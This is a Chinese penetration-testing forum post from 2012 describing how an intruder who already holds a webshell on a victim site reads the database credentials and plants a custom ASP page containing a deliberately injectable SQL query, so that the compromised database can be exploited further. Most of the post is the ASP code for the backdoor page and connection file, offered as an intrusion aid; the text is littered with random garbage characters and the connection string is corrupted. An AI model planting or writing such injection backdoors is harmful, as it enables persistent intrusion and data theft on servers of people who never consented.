中国网络渗透测试联盟

标题: 自己构造注入点方便入侵 [打印本页]

作者: admin    时间: 2012-9-13 17:27
标题: 自己构造注入点方便入侵
自己构造注入点方便入侵$ |  p- P- E: f

( j4 @+ x0 L; [+ w2 d+ N今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息( `. u! v; ~6 ^% G! j9 H

0 J3 m# T' U. T7 R+ E这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
6 l% e1 w' k$ y7 L5 \; t5 R( H$ K' y- I$ V* K6 A1 U
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
# V9 l! c. d# D: y8 `; Q$ v1 c! d% @* M0 N
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
! ]! r4 n5 c/ s5 H1 x) u( \! {- H
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:6 j* I+ M1 c' I% [! |
! u! R4 D0 z0 h" ]8 z* Q# K( d; i
程序代码+ r' l7 u. k6 d- [* I3 I9 p
<!--#include file="xx.asp"-->
$ ]- j+ ]7 y5 o1 ?+ v! `<%
" V: J8 H) i* T9 ~set rs=server.createobject("ADODB.recordset"); `& G4 c( B$ d% h1 m
id = request("id")
4 v, i5 T: [8 T1 O+ R6 `strSQL = "select * from admin where id=" & id
' e" C' F$ C1 ~  b6 B. Vrs.open strSQL,conn,1,3
- b2 o+ w! U2 L5 s* z- d5 ?& crs.close7 e! `( ^* e# t+ ]0 x0 @. b
%>
* ^+ }* \" P; l# `; J/ ?  \6 g1 u/ Y& b0 w4 A0 d% ^
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在% @' J$ G% A! a- J+ I8 p
+ ?  l4 o* Q+ K, k
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!
7 f1 a7 d& a# y. B
, z  j4 q. _  A4 s3 G2 R然后就要构造一个连接数据库的文件了,代码如下:2 t# o- h( f8 b# J0 @& F; M
程序代码7 A/ P7 ~/ w$ s8 {7 Y) Z5 _/ D1 |
<%        
( q& {' M9 J6 Z5 d8 bstrSQLServerName = "000.000.000.000"     '服务器名称或地址6 ~( n, r! N1 p  ^+ z; k: y3 |
strSQLDBUserName = "sqlname"         '数据库帐号
( v: j/ Z. X" ~( ~% L$ ?, qstrSQLDBPassword = "sqlpass"         '数据库密码
2 V+ P; c( }! T1 t, q6 c, DstrSQLDBName = "sqldataname"           '数据库名称
, G0 {4 p7 A; H. cSet conn = Server.CreateObject("ADODB.Connection")9 K" r9 B2 n7 p; c$ z
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
) a( |9 m$ B& u5 A8 j% c, tconn.open strCon8 n# R' ~/ w+ Z! T8 M7 |
%>
) n) @; Y4 b. x. _; J9 l) k
% T* [/ ]4 m" X# e& n这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,1 v8 S4 C7 ]1 @% H3 j2 E: R3 j; y

& M: f5 |. m$ |! }3 A6 y- c就这样,正常情况下,就OK了,伪造成功……, t2 G9 }: |' m2 K

% d# ]# o: |/ W! B; m/ l; B. h. h+ F           如果有什么问题可以提出来大家一起探讨解决。




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2